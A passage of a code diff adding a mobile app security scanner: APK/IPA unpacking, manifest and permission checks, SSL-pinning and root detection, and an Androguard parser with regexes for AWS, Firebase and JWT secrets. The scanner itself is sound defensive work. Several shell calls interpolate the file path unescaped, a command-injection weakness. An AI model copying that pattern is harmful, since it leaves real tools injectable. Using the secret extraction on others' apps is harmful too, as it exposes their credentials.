+    filePath: string,
+    options: OrchestratorOptions = {}
+  ): Promise<MobileScanTypes.MobileScanResult> {
+    const profileId = options.profile || "standard"
+    let profile = MobileScanProfiles.get(profileId) || MobileScanProfiles.Standard
+
+    // Apply custom profile overrides
+    if (options.customProfile) {
+      profile = MobileScanProfiles.createCustom(profileId, options.customProfile)
+    }
+
+    // Detect platform
+    const platform = detectPlatform(filePath)
+    if (!platform) {
+      throw new Error(`Unsupported file format: ${path.extname(filePath)}`)
+    }
+
+    const startTime = Date.now()
+
+    // Get file info
+    const stats = await fs.stat(filePath)
+    const fileHash = await calculateFileHash(filePath)
+
+    const scanId = MobileScanStorage.createScanId()
+    const appId = MobileScanStorage.createAppId(fileHash)
+
+    log.info("Starting mobile scan", { scanId, filePath, platform, profile: profile.id })
+
+    // Create app record
+    const app: MobileScanTypes.MobileApp = {
+      id: appId,
+      sessionID: scanId,
+      platform,
+      name: path.basename(filePath, path.extname(filePath)),
+      packageName: "",
+      version: "",
+      filePath,
+      fileHash,
+      size: stats.size,
+      analyzedAt: startTime,
+    }
+
+    // Create initial result
+    const result: MobileScanTypes.MobileScanResult = {
+      id: scanId,
+      appId,
+      app,
+      profile: profile.id,
+      platform,
+      status: "running",
+      findings: [],
+      permissions: {
+        total: 0,
+        dangerous: 0,
+        normal: 0,
+        signature: 0,
+        custom: 0,
+        highRisk: [],
+        unusualCombinations: [],
+        recommendations: [],
+      },
+      networkSecurity: {
+        cleartextAllowed: false,
+        insecureConnections: [],
+        customTrustManagers: [],
+      },
+      binaryProtections: platform === "ios"
+        ? { pie: false, arc: false, stackCanary: false }
+        : undefined,
+      secrets: [],
+      urls: [],
+      libraries: [],
+      stats: {
+        filesAnalyzed: 0,
+        classesAnalyzed: 0,
+        methodsAnalyzed: 0,
+        stringsExtracted: 0,
+        urlsExtracted: 0,
+        secretsFound: 0,
+        findingsTotal: 0,
+        findingsBySeverity: {
+          critical: 0,
+          high: 0,
+          medium: 0,
+          low: 0,
+          info: 0,
+        },
+        duration: 0,
+      },
+      startTime,
+    }
+
+    // Emit scan started event
+    Bus.publish(MobileScanEvents.ScanStarted, {
+      scanId,
+      appId,
+      profile: profile.id,
+      platform,
+      packageName: "",
+    })
+
+    try {
+      // Setup output directory
+      const outputDir = options.outputDir || `/tmp/mobilescan_${scanId}`
+      await fs.mkdir(outputDir, { recursive: true })
+
+      if (platform === "android") {
+        await analyzeAndroid(filePath, outputDir, profile, options, result, app, scanId, appId)
+      } else {
+        await analyzeIOS(filePath, outputDir, profile, options, result, app, scanId, appId)
+      }
+
+      result.status = "completed"
+      result.endTime = Date.now()
+
+      // Update stats
+      const criticalCount = result.findings.filter((f) => f.severity === "critical").length
+      const highCount = result.findings.filter((f) => f.severity === "high").length
+      const mediumCount = result.findings.filter((f) => f.severity === "medium").length
+      const lowCount = result.findings.filter((f) => f.severity === "low").length
+      const infoCount = result.findings.filter((f) => f.severity === "info").length
+
+      result.stats = {
+        filesAnalyzed: result.stats.filesAnalyzed,
+        classesAnalyzed: result.stats.classesAnalyzed,
+        methodsAnalyzed: result.stats.methodsAnalyzed,
+        stringsExtracted: result.stats.stringsExtracted,
+        urlsExtracted: result.urls.length,
+        secretsFound: result.secrets.length,
+        findingsTotal: result.findings.length,
+        findingsBySeverity: {
+          critical: criticalCount,
+          high: highCount,
+          medium: mediumCount,
+          low: lowCount,
+          info: infoCount,
+        },
+        duration: (result.endTime || Date.now()) - startTime,
+      }
+
+      // Emit scan completed event
+      Bus.publish(MobileScanEvents.ScanCompleted, {
+        scanId,
+        appId,
+        platform,
+        findingsCount: result.findings.length,
+        criticalCount,
+        highCount,
+        mediumCount,
+        duration: result.endTime - startTime,
+        status: "completed",
+      })
+    } catch (err) {
+      result.status = "failed"
+      result.endTime = Date.now()
+      result.error = String(err)
+
+      Bus.publish(MobileScanEvents.ScanFailed, {
+        scanId,
+        appId,
+        error: String(err),
+      })
+
+      log.error("Scan failed", { scanId, error: String(err) })
+    }
+
+    // Save results
+    await MobileScanStorage.saveApp(app, options.storageConfig)
+    await MobileScanStorage.saveScan(result, options.storageConfig)
+
+    log.info("Mobile scan complete", {
+      scanId,
+      status: result.status,
+      findings: result.findings.length,
+      duration: (result.endTime || Date.now()) - startTime,
+    })
+
+    return result
+  }
+
+  /**
+   * Analyze Android APK.
+   */
+  async function analyzeAndroid(
+    filePath: string,
+    outputDir: string,
+    profile: MobileScanTypes.ScanProfile,
+    options: OrchestratorOptions,
+    result: MobileScanTypes.MobileScanResult,
+    app: MobileScanTypes.MobileApp,
+    scanId: string,
+    appId: string
+  ): Promise<void> {
+    log.info("Analyzing Android APK", { filePath })
+
+    let javaFiles: string[] = []
+
+    // Unpack with apktool if decompile is enabled
+    if (profile.decompile.enabled) {
+      log.info("Unpacking APK with apktool")
+      try {
+        execSync(`apktool d -f -o "${outputDir}/apktool" "${filePath}"`, { timeout: 120000 })
+      } catch (err) {
+        log.warn("apktool unpacking failed", { error: String(err) })
+      }
+    }
+
+    // Decompile with jadx if sources enabled
+    if (profile.decompile.enabled && profile.decompile.decompileSources) {
+      log.info("Decompiling APK with jadx")
+      try {
+        const jadxOutput = path.join(outputDir, "jadx")
+        execSync(`jadx -d "${jadxOutput}" "${filePath}"`, { timeout: 300000 })
+        // Find Java files
+        const glob = new Bun.Glob("**/*.java")
+        for await (const file of glob.scan({ cwd: jadxOutput, absolute: true })) {
+          javaFiles.push(file)
+        }
+      } catch (err) {
+        log.warn("jadx decompilation failed", { error: String(err) })
+      }
+    }
+
+    // Parse manifest
+    const manifestPath = path.join(outputDir, "apktool", "AndroidManifest.xml")
+    try {
+      const manifestContent = await fs.readFile(manifestPath, "utf-8")
+      const manifest = ApktoolParser.parseManifestXml(manifestContent)
+      result.manifest = manifest
+      app.packageName = manifest.packageName
+      app.version = manifest.versionName
+
+      Bus.publish(MobileScanEvents.AppAnalyzed, {
+        appId,
+        platform: "android",
+        packageName: manifest.packageName,
+        version: manifest.versionName,
+        fileHash: app.fileHash,
+      })
+
+      // Manifest analysis
+      if (profile.staticAnalysis.manifest) {
+        const manifestFindings = ManifestAnalyzer.analyze(manifest, scanId, appId)
+        result.findings.push(...manifestFindings)
+      }
+
+      // Permission analysis
+      if (profile.staticAnalysis.permissions) {
+        const permissionResult = PermissionAnalyzer.analyze(manifest.permissions, scanId, appId)
+        result.permissions = permissionResult.analysis
+        result.findings.push(...permissionResult.findings)
+      }
+
+      // Component analysis
+      if (profile.staticAnalysis.components) {
+        const componentFindings = ComponentAnalyzer.analyze(manifest, scanId, appId)
+        result.findings.push(...componentFindings)
+      }
+
+      // Network security config
+      if (profile.staticAnalysis.network && manifest.networkSecurityConfig) {
+        const nscPath = path.join(outputDir, "apktool", "res", "xml", manifest.networkSecurityConfig.replace("@xml/", "") + ".xml")
+        try {
+          const nscContent = await fs.readFile(nscPath, "utf-8")
+          const nsc = ApktoolParser.parseNetworkSecurityConfigXml(nscContent)
+          if (result.networkSecurity) {
+            result.networkSecurity.cleartextAllowed = nsc.cleartextTrafficPermitted
+          }
+        } catch {
+          // NSC not found
+        }
+      }
+    } catch (err) {
+      log.warn("Failed to parse manifest", { error: String(err) })
+    }
+
+    // Code analysis (if decompiled)
+    if (javaFiles.length > 0) {
+      await analyzeAndroidCode(javaFiles, profile, result, scanId, appId)
+    }
+
+    // MobSF integration
+    if (profile.externalTools?.mobsf && options.mobsfUrl && options.mobsfApiKey) {
+      await runMobSFAnalysis(filePath, "android", options, result, scanId, appId)
+    }
+  }
+
+  /**
+   * Analyze Android code.
+   */
+  async function analyzeAndroidCode(
+    javaFiles: string[],
+    profile: MobileScanTypes.ScanProfile,
+    result: MobileScanTypes.MobileScanResult,
+    scanId: string,
+    appId: string
+  ): Promise<void> {
+    // Crypto analysis
+    if (profile.staticAnalysis.crypto) {
+      const cryptoResult = await AndroidSecurityAnalyzer.analyzeCrypto(javaFiles, scanId, appId)
+      result.cryptoAnalysis = cryptoResult.analysis
+      result.findings.push(...cryptoResult.findings)
+    }
+
+    // Storage analysis
+    if (profile.staticAnalysis.storage) {
+      const storageResult = await AndroidSecurityAnalyzer.analyzeStorage(javaFiles, scanId, appId)
+      result.storageAnalysis = storageResult.analysis
+      result.findings.push(...storageResult.findings)
+    }
+
+    // Network analysis
+    if (profile.staticAnalysis.network) {
+      const networkResult = await AndroidSecurityAnalyzer.analyzeNetwork(javaFiles, null, scanId, appId)
+      if (result.networkSecurity) {
+        Object.assign(result.networkSecurity, networkResult.analysis)
+      }
+      result.findings.push(...networkResult.findings)
+    }
+
+    // SSL pinning detection
+    if (profile.staticAnalysis.sslPinning) {
+      const sslResult = await SSLPinningDetector.detectAndroid(javaFiles)
+      if (result.networkSecurity) {
+        result.networkSecurity.sslPinning = sslResult
+      }
+
+      if (!sslResult.detected) {
+        Bus.publish(MobileScanEvents.SSLPinningMissing, { scanId, appId })
+        result.findings.push(createFinding(scanId, appId, "android", {
+          title: "No SSL/TLS Certificate Pinning Detected",
+          description: "The application does not implement certificate pinning, making it vulnerable to man-in-the-middle attacks.",
+          severity: "high",
+          owaspMobile: "M5",
+          category: "network",
+          recommendation: "Implement certificate pinning using OkHttp CertificatePinner, TrustManager, or Network Security Configuration.",
+        }))
+      }
+    }
+
+    // Root detection
+    if (profile.staticAnalysis.rootDetection) {
+      const rootResult = await RootDetector.detectAndroid(javaFiles)
+      result.rootDetection = rootResult
+
+      if (!rootResult.detected) {
+        result.findings.push(createFinding(scanId, appId, "android", {
+          title: "No Root Detection Implemented",
+          description: "The application does not check for rooted devices, which may expose sensitive data or functionality.",
+          severity: "medium",
+          owaspMobile: "M8",
+          category: "binary",
+          recommendation: "Implement root detection using SafetyNet, RootBeer, or custom checks.",
+        }))
+      }
+    }
+
+    // Secret detection
+    if (profile.staticAnalysis.secrets) {
+      const secrets = await ApiKeyExtractor.extractFromFiles(javaFiles)
+      result.secrets = secrets.map((s) => ({
+        ...s,
+        scanId,
+        appId,
+        platform: "android" as const,
+      }))
+
+      for (const secret of secrets) {
+        Bus.publish(MobileScanEvents.SecretFound, {
+          scanId,
+          secretType: secret.type,
+          location: secret.location.file,
+          confidence: secret.confidence,
+        })
+      }
+    }
+
+    // URL extraction
+    if (profile.staticAnalysis.urls) {
+      const urls = await UrlExtractor.extractFromFiles(javaFiles)
+      result.urls = urls.map((u) => ({
+        ...u,
+        scanId,
+        appId,
+        platform: "android" as const,
+      }))
+    }
+  }
+
+  /**
+   * Analyze iOS IPA.
+   */
+  async function analyzeIOS(
+    filePath: string,
+    outputDir: string,
+    profile: MobileScanTypes.ScanProfile,
+    options: OrchestratorOptions,
+    result: MobileScanTypes.MobileScanResult,
+    app: MobileScanTypes.MobileApp,
+    scanId: string,
+    appId: string
+  ): Promise<void> {
+    log.info("Analyzing iOS IPA", { filePath })
+
+    // Unpack IPA (it's just a zip)
+    try {
+      execSync(`unzip -q -o "${filePath}" -d "${outputDir}"`, { timeout: 60000 })
+    } catch {
+      throw new Error("Failed to unpack IPA file")
+    }
+
+    // Find app bundle
+    const payloadDir = path.join(outputDir, "Payload")
+    const payloadContents = await fs.readdir(payloadDir)
+    const appBundle = payloadContents.find((f) => f.endsWith(".app"))
+    if (!appBundle) {
+      throw new Error("No .app bundle found in IPA")
+    }
+    const appDir = path.join(payloadDir, appBundle)
+
+    // Parse Info.plist
+    const plistPath = path.join(appDir, "Info.plist")
+    try {
+      const plistContent = await fs.readFile(plistPath, "utf-8")
+      const plist = PlistAnalyzer.parsePlistContent(plistContent)
+      result.manifest = plist
+      app.packageName = plist.bundleId
+      app.version = plist.version
+      app.minOSVersion = plist.minOSVersion
+
+      Bus.publish(MobileScanEvents.AppAnalyzed, {
+        appId,
+        platform: "ios",
+        packageName: plist.bundleId,
+        version: plist.version,
+        fileHash: app.fileHash,
+      })
+
+      // Plist analysis
+      if (profile.staticAnalysis.manifest) {
+        const plistFindings = PlistAnalyzer.analyze(plist, scanId, appId)
+        result.findings.push(...plistFindings)
+      }
+
+      // ATS analysis
+      if (profile.staticAnalysis.network && plist.atsSettings && result.networkSecurity) {
+        result.networkSecurity.cleartextAllowed = plist.atsSettings.allowsArbitraryLoads
+      }
+
+      // Permission analysis (iOS uses usage descriptions)
+      if (profile.staticAnalysis.permissions && result.permissions) {
+        const permKeys = Object.keys(plist.usageDescriptions)
+        result.permissions.total = permKeys.length
+      }
+    } catch (err) {
+      log.warn("Failed to parse Info.plist", { error: String(err) })
+    }
+
+    // Binary analysis
+    const plist = result.manifest as MobileScanTypes.IOSPlist | undefined
+    const binaryName = plist?.bundleName || appBundle.replace(".app", "")
+    const binaryPath = path.join(appDir, binaryName)
+
+    // Find source files for code analysis
+    let sourceFiles: string[] = []
+    if (profile.decompile.enabled) {
+      const stringsOutput = path.join(outputDir, "strings.txt")
+      try {
+        execSync(`strings "${binaryPath}" > "${stringsOutput}"`, { timeout: 60000 })
+        sourceFiles = [stringsOutput]
+      } catch {
+        log.debug("Could not extract strings from binary")
+      }
+    }
+
+    // Code analysis
+    if (sourceFiles.length > 0) {
+      await analyzeIOSCode(sourceFiles, profile, result, scanId, appId)
+    }
+
+    // MobSF integration
+    if (profile.externalTools?.mobsf && options.mobsfUrl && options.mobsfApiKey) {
+      await runMobSFAnalysis(filePath, "ios", options, result, scanId, appId)
+    }
+  }
+
+  /**
+   * Analyze iOS code.
+   */
+  async function analyzeIOSCode(
+    sourceFiles: string[],
+    profile: MobileScanTypes.ScanProfile,
+    result: MobileScanTypes.MobileScanResult,
+    scanId: string,
+    appId: string
+  ): Promise<void> {
+    // SSL pinning detection
+    if (profile.staticAnalysis.sslPinning) {
+      const sslResult = await SSLPinningDetector.detectiOS(sourceFiles)
+      if (result.networkSecurity) {
+        result.networkSecurity.sslPinning = sslResult
+      }
+
+      if (!sslResult.detected) {
+        Bus.publish(MobileScanEvents.SSLPinningMissing, { scanId, appId })
+        result.findings.push(createFinding(scanId, appId, "ios", {
+          title: "No SSL/TLS Certificate Pinning Detected",
+          description: "The application does not appear to implement certificate pinning.",
+          severity: "high",
+          owaspMobile: "M5",
+          category: "network",
+          recommendation: "Implement certificate pinning using URLSession delegate methods or TrustKit.",
+        }))
+      }
+    }
+
+    // Jailbreak detection
+    if (profile.staticAnalysis.rootDetection) {
+      const jbResult = await RootDetector.detectiOS(sourceFiles)
+      result.rootDetection = jbResult
+
+      if (!jbResult.detected) {
+        result.findings.push(createFinding(scanId, appId, "ios", {
+          title: "No Jailbreak Detection Implemented",
+          description: "The application does not check for jailbroken devices.",
+          severity: "medium",
+          owaspMobile: "M8",
+          category: "binary",
+          recommendation: "Implement jailbreak detection to protect sensitive functionality.",
+        }))
+      }
+    }
+
+    // Secret detection
+    if (profile.staticAnalysis.secrets) {
+      const secrets = await ApiKeyExtractor.extractFromFiles(sourceFiles)
+      result.secrets = secrets.map((s) => ({
+        ...s,
+        scanId,
+        appId,
+        platform: "ios" as const,
+      }))
+
+      for (const secret of secrets) {
+        Bus.publish(MobileScanEvents.SecretFound, {
+          scanId,
+          secretType: secret.type,
+          location: secret.location.file,
+          confidence: secret.confidence,
+        })
+      }
+    }
+
+    // URL extraction
+    if (profile.staticAnalysis.urls) {
+      const urls = await UrlExtractor.extractFromFiles(sourceFiles)
+      result.urls = urls.map((u) => ({
+        ...u,
+        scanId,
+        appId,
+        platform: "ios" as const,
+      }))
+    }
+  }
+
+  /**
+   * Run MobSF analysis.
+   * Note: MobSF integration requires external setup. This function is a placeholder
+   * for when MobSF API integration is implemented.
+   */
+  async function runMobSFAnalysis(
+    _filePath: string,
+    _platform: MobileScanTypes.Platform,
+    _options: OrchestratorOptions,
+    _result: MobileScanTypes.MobileScanResult,
+    _scanId: string,
+    _appId: string
+  ): Promise<void> {
+    // MobSF integration requires:
+    // 1. Upload file to MobSF server via REST API
+    // 2. Wait for scan to complete
+    // 3. Download report and parse it
+    // This is left as a placeholder for future implementation
+    log.info("MobSF integration not yet implemented - skipping")
+  }
+
+  /**
+   * Parse an existing MobSF report.
+   */
+  export function parseMobSFReport(
+    report: MobsfParser.MobSFAndroidResult | MobsfParser.MobSFiOSResult,
+    platform: MobileScanTypes.Platform,
+    scanId: string,
+    appId: string
+  ): MobsfParser.ParsedMobSFResult {
+    if (platform === "android") {
+      return MobsfParser.parseAndroidReport(report as MobsfParser.MobSFAndroidResult, scanId, appId)
+    } else {
+      return MobsfParser.parseiOSReport(report as MobsfParser.MobSFiOSResult, scanId, appId)
+    }
+  }
+
+  /**
+   * Create a finding.
+   */
+  function createFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform,
+    data: {
+      title: string
+      description: string
+      severity: MobileScanTypes.Severity
+      owaspMobile: MobileScanTypes.OwaspMobile
+      category: string
+      recommendation: string
+    }
+  ): MobileScanTypes.MobileFinding {
+    return {
+      id: MobileScanStorage.createFindingId(),
+      scanId,
+      appId,
+      platform,
+      title: data.title,
+      description: data.description,
+      severity: data.severity,
+      owaspMobile: data.owaspMobile,
+      category: data.category,
+      recommendation: data.recommendation,
+      references: [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Detect platform from file extension.
+   */
+  function detectPlatform(filePath: string): MobileScanTypes.Platform | null {
+    const ext = path.extname(filePath).toLowerCase()
+    if (ext === ".apk") return "android"
+    if (ext === ".ipa") return "ios"
+    return null
+  }
+
+  /**
+   * Calculate file hash.
+   */
+  async function calculateFileHash(filePath: string): Promise<string> {
+    const fileBuffer = await fs.readFile(filePath)
+    return crypto.createHash("sha256").update(fileBuffer).digest("hex")
+  }
+
+  /**
+   * Quick scan for critical issues only.
+   */
+  export async function quickScan(
+    filePath: string,
+    options: Omit<OrchestratorOptions, "profile"> = {}
+  ): Promise<MobileScanTypes.MobileScanResult> {
+    return analyze(filePath, { ...options, profile: "quick" })
+  }
+
+  /**
+   * Get scan status.
+   */
+  export async function getStatus(
+    scanId: string,
+    storageConfig?: { storage?: "file" | "memory" }
+  ): Promise<MobileScanTypes.MobileScanResult | null> {
+    return MobileScanStorage.getScan(scanId, storageConfig)
+  }
+
+  /**
+   * List all scans.
+   */
+  export async function listScans(
+    storageConfig?: { storage?: "file" | "memory" },
+    filters?: {
+      platform?: "android" | "ios"
+      profile?: MobileScanTypes.ProfileId
+      status?: MobileScanTypes.Status
+      limit?: number
+    }
+  ): Promise<MobileScanTypes.MobileScanResult[]> {
+    return MobileScanStorage.listScans(storageConfig, filters)
+  }
+
+  /**
+   * Get app by ID.
+   */
+  export async function getApp(
+    appId: string,
+    storageConfig?: { storage?: "file" | "memory" }
+  ): Promise<MobileScanTypes.MobileApp | null> {
+    return MobileScanStorage.getApp(appId, storageConfig)
+  }
+
+  /**
+   * List all analyzed apps.
+   */
+  export async function listApps(
+    storageConfig?: { storage?: "file" | "memory" },
+    filters?: {
+      platform?: "android" | "ios"
+      limit?: number
+    }
+  ): Promise<MobileScanTypes.MobileApp[]> {
+    return MobileScanStorage.listApps(storageConfig, filters)
+  }
+
+  /**
+   * Get findings for a scan.
+   */
+  export async function getFindings(
+    scanId: string,
+    storageConfig?: { storage?: "file" | "memory" },
+    filters?: {
+      severity?: MobileScanTypes.Severity
+      owaspMobile?: MobileScanTypes.OwaspMobile
+      category?: string
+    }
+  ): Promise<MobileScanTypes.MobileFinding[]> {
+    return MobileScanStorage.listFindings(storageConfig, { scanId, ...filters })
+  }
+
+  /**
+   * Get secrets for a scan.
+   */
+  export async function getSecrets(
+    scanId: string,
+    storageConfig?: { storage?: "file" | "memory" }
+  ): Promise<MobileScanTypes.ExtractedSecret[]> {
+    // Get secrets from the scan result directly since storage doesn't filter by scanId
+    const scan = await MobileScanStorage.getScan(scanId, storageConfig)
+    return scan?.secrets || []
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/parsers/androguard.ts b/packages/opencode/src/pentest/mobilescan/parsers/androguard.ts
new file mode 100644
index 00000000000..adc2c613477
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/parsers/androguard.ts
@@ -0,0 +1,551 @@
+/**
+ * @fileoverview Androguard Analysis Parser
+ *
+ * Parser for Androguard Python-based Android analysis output.
+ * Extracts DEX analysis, permissions, and method call information.
+ *
+ * @module pentest/mobilescan/parsers/androguard
+ */
+
+import { MobileScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "mobilescan.parser.androguard" })
+
+/**
+ * Androguard parser namespace.
+ */
+export namespace AndroguardParser {
+  /**
+   * Androguard analysis result.
+   */
+  export interface AndroguardResult {
+    package_name: string
+    app_name: string
+    version_name: string
+    version_code: number
+    min_sdk: number
+    target_sdk: number
+    permissions: string[]
+    activities: string[]
+    services: string[]
+    receivers: string[]
+    providers: string[]
+    files: FileInfo[]
+    dex_analysis: DexAnalysis
+    strings: string[]
+    certificates: CertificateInfo[]
+  }
+
+  /**
+   * File information.
+   */
+  export interface FileInfo {
+    name: string
+    type: string
+    crc32: string
+    size: number
+  }
+
+  /**
+   * DEX analysis result.
+   */
+  export interface DexAnalysis {
+    classes: ClassInfo[]
+    methods: MethodInfo[]
+    strings: string[]
+    api_calls: ApiCall[]
+    crypto_analysis: CryptoAnalysis
+    reflection_calls: ReflectionCall[]
+    native_calls: NativeCall[]
+  }
+
+  /**
+   * Class information.
+   */
+  export interface ClassInfo {
+    name: string
+    access_flags: string[]
+    superclass: string
+    interfaces: string[]
+    methods_count: number
+    fields_count: number
+  }
+
+  /**
+   * Method information.
+   */
+  export interface MethodInfo {
+    class_name: string
+    name: string
+    descriptor: string
+    access_flags: string[]
+    is_native: boolean
+    calls: string[]
+  }
+
+  /**
+   * API call information.
+   */
+  export interface ApiCall {
+    class_name: string
+    method_name: string
+    called_from: string[]
+    category: string
+    risk_level: string
+  }
+
+  /**
+   * Crypto analysis result.
+   */
+  export interface CryptoAnalysis {
+    algorithms: CryptoAlgorithm[]
+    hardcoded_keys: HardcodedKey[]
+    random_usage: RandomUsage[]
+  }
+
+  /**
+   * Cryptographic algorithm usage.
+   */
+  export interface CryptoAlgorithm {
+    algorithm: string
+    mode: string
+    padding: string
+    locations: string[]
+    is_weak: boolean
+    recommendation: string
+  }
+
+  /**
+   * Hardcoded cryptographic key.
+   */
+  export interface HardcodedKey {
+    type: string
+    value: string
+    location: string
+    risk: string
+  }
+
+  /**
+   * Random number generator usage.
+   */
+  export interface RandomUsage {
+    class_name: string
+    is_secure: boolean
+    location: string
+  }
+
+  /**
+   * Reflection call.
+   */
+  export interface ReflectionCall {
+    method: string
+    target: string
+    location: string
+  }
+
+  /**
+   * Native method call.
+   */
+  export interface NativeCall {
+    method: string
+    library: string
+    location: string
+  }
+
+  /**
+   * Certificate information.
+   */
+  export interface CertificateInfo {
+    subject: string
+    issuer: string
+    serial: string
+    not_before: string
+    not_after: string
+    algorithm: string
+    is_debug: boolean
+  }
+
+  /**
+   * Parse Androguard JSON output.
+   */
+  export function parseOutput(json: AndroguardResult): ParsedAndroguardResult {
+    log.info("Parsing Androguard output", { packageName: json.package_name })
+
+    const findings: PartialFinding[] = []
+    const secrets: PartialSecret[] = []
+    const cryptoIssues: CryptoIssue[] = []
+
+    // Analyze crypto usage
+    if (json.dex_analysis?.crypto_analysis) {
+      const crypto = json.dex_analysis.crypto_analysis
+
+      // Check for weak algorithms
+      for (const algo of crypto.algorithms || []) {
+        if (algo.is_weak) {
+          findings.push({
+            title: `Weak Cryptographic Algorithm: ${algo.algorithm}`,
+            description: `The application uses weak cryptographic algorithm ${algo.algorithm}${algo.mode ? ` with mode ${algo.mode}` : ""}. ${algo.recommendation}`,
+            severity: "high",
+            owaspMobile: "M10",
+            category: "crypto",
+            evidence: algo.locations.join(", "),
+          })
+
+          cryptoIssues.push({
+            algorithm: algo.algorithm,
+            mode: algo.mode,
+            isWeak: true,
+            locations: algo.locations,
+          })
+        }
+      }
+
+      // Check for hardcoded keys
+      for (const key of crypto.hardcoded_keys || []) {
+        findings.push({
+          title: `Hardcoded Cryptographic Key: ${key.type}`,
+          description: `A hardcoded ${key.type} was found in the application.`,
+          severity: key.risk === "high" ? "high" : "medium",
+          owaspMobile: "M1",
+          category: "crypto",
+          evidence: key.location,
+        })
+
+        secrets.push({
+          type: "encryption_key",
+          value: key.value,
+          location: key.location,
+          confidence: "high",
+        })
+      }
+
+      // Check for insecure random
+      for (const random of crypto.random_usage || []) {
+        if (!random.is_secure) {
+          findings.push({
+            title: "Insecure Random Number Generator",
+            description: `The application uses java.util.Random instead of java.security.SecureRandom at ${random.location}.`,
+            severity: "medium",
+            owaspMobile: "M10",
+            category: "crypto",
+            evidence: random.location,
+          })
+        }
+      }
+    }
+
+    // Analyze API calls
+    if (json.dex_analysis?.api_calls) {
+      for (const call of json.dex_analysis.api_calls) {
+        if (call.risk_level === "high") {
+          findings.push({
+            title: `High-Risk API Call: ${call.class_name}.${call.method_name}`,
+            description: `The application calls ${call.class_name}.${call.method_name} which is categorized as ${call.category}.`,
+            severity: "medium",
+            owaspMobile: mapCategoryToOwasp(call.category),
+            category: call.category,
+            evidence: call.called_from.slice(0, 3).join(", "),
+          })
+        }
+      }
+    }
+
+    // Analyze reflection calls (potential obfuscation bypass or dynamic loading)
+    if (json.dex_analysis?.reflection_calls && json.dex_analysis.reflection_calls.length > 10) {
+      findings.push({
+        title: "Extensive Use of Reflection",
+        description: `The application uses reflection extensively (${json.dex_analysis.reflection_calls.length} calls). This may indicate obfuscation or dynamic code loading.`,
+        severity: "info",
+        owaspMobile: "M7",
+        category: "code",
+        evidence: `${json.dex_analysis.reflection_calls.length} reflection calls detected`,
+      })
+    }
+
+    // Check certificates
+    for (const cert of json.certificates || []) {
+      if (cert.is_debug) {
+        findings.push({
+          title: "Debug Certificate Detected",
+          description: "The application is signed with a debug certificate. This should not be used in production.",
+          severity: "high",
+          owaspMobile: "M8",
+          category: "certificate",
+          evidence: `Subject: ${cert.subject}`,
+        })
+      }
+
+      // Check for expired certificate
+      const notAfter = new Date(cert.not_after)
+      if (notAfter < new Date()) {
+        findings.push({
+          title: "Expired Certificate",
+          description: `The application certificate expired on ${cert.not_after}.`,
+          severity: "medium",
+          owaspMobile: "M8",
+          category: "certificate",
+          evidence: `Expired: ${cert.not_after}`,
+        })
+      }
+    }
+
+    // Analyze native calls for potential security issues
+    if (json.dex_analysis?.native_calls) {
+      const dangerousNative = json.dex_analysis.native_calls.filter((nc) =>
+        ["exec", "system", "popen", "dlopen", "dlsym"].some((fn) => nc.method.toLowerCase().includes(fn))
+      )
+
+      if (dangerousNative.length > 0) {
+        findings.push({
+          title: "Potentially Dangerous Native Calls",
+          description: `The application makes ${dangerousNative.length} potentially dangerous native calls that could be used for code execution or library loading.`,
+          severity: "medium",
+          owaspMobile: "M7",
+          category: "native",
+          evidence: dangerousNative
+            .slice(0, 3)
+            .map((nc) => nc.method)
+            .join(", "),
+        })
+      }
+    }
+
+    // Extract strings that might be secrets
+    const suspiciousStrings = extractSuspiciousStrings(json.strings || [])
+    for (const str of suspiciousStrings) {
+      secrets.push({
+        type: str.type,
+        value: str.value,
+        location: "strings",
+        confidence: str.confidence,
+      })
+    }
+
+    return {
+      findings,
+      secrets,
+      cryptoIssues,
+      classCount: json.dex_analysis?.classes?.length || 0,
+      methodCount: json.dex_analysis?.methods?.length || 0,
+      stringCount: json.strings?.length || 0,
+    }
+  }
+
+  /**
+   * Partial finding (without scan/app IDs).
+   */
+  export interface PartialFinding {
+    title: string
+    description: string
+    severity: MobileScanTypes.Severity
+    owaspMobile: MobileScanTypes.OwaspMobile
+    category: string
+    evidence?: string
+  }
+
+  /**
+   * Partial secret (without ID).
+   */
+  export interface PartialSecret {
+    type: MobileScanTypes.SecretType
+    value: string
+    location: string
+    confidence: "high" | "medium" | "low"
+  }
+
+  /**
+   * Crypto issue.
+   */
+  export interface CryptoIssue {
+    algorithm: string
+    mode?: string
+    isWeak: boolean
+    locations: string[]
+  }
+
+  /**
+   * Parsed Androguard result.
+   */
+  export interface ParsedAndroguardResult {
+    findings: PartialFinding[]
+    secrets: PartialSecret[]
+    cryptoIssues: CryptoIssue[]
+    classCount: number
+    methodCount: number
+    stringCount: number
+  }
+
+  /**
+   * Map API category to OWASP Mobile.
+   */
+  function mapCategoryToOwasp(category: string): MobileScanTypes.OwaspMobile {
+    const categoryMap: Record<string, MobileScanTypes.OwaspMobile> = {
+      crypto: "M10",
+      storage: "M9",
+      network: "M5",
+      auth: "M3",
+      input: "M4",
+      privacy: "M6",
+      binary: "M7",
+      config: "M8",
+      credential: "M1",
+    }
+
+    return categoryMap[category.toLowerCase()] || "M8"
+  }
+
+  /**
+   * Extract suspicious strings that might be secrets.
+   */
+  function extractSuspiciousStrings(
+    strings: string[]
+  ): Array<{ type: MobileScanTypes.SecretType; value: string; confidence: "high" | "medium" | "low" }> {
+    const suspicious: Array<{ type: MobileScanTypes.SecretType; value: string; confidence: "high" | "medium" | "low" }> =
+      []
+
+    for (const str of strings) {
+      // Skip common strings
+      if (str.length < 20 || str.length > 500) continue
+      if (/^[a-z]+$/i.test(str)) continue // Just letters
+      if (/^\d+$/.test(str)) continue // Just numbers
+
+      // AWS keys
+      if (/^AKIA[0-9A-Z]{16}$/.test(str)) {
+        suspicious.push({ type: "aws_key", value: str, confidence: "high" })
+        continue
+      }
+
+      // Google/Firebase API keys
+      if (/^AIza[0-9A-Za-z_-]{35}$/.test(str)) {
+        suspicious.push({ type: "firebase_key", value: str, confidence: "high" })
+        continue
+      }
+
+      // JWT tokens
+      if (/^eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*$/.test(str)) {
+        suspicious.push({ type: "jwt_secret", value: str, confidence: "high" })
+        continue
+      }
+
+      // Private keys
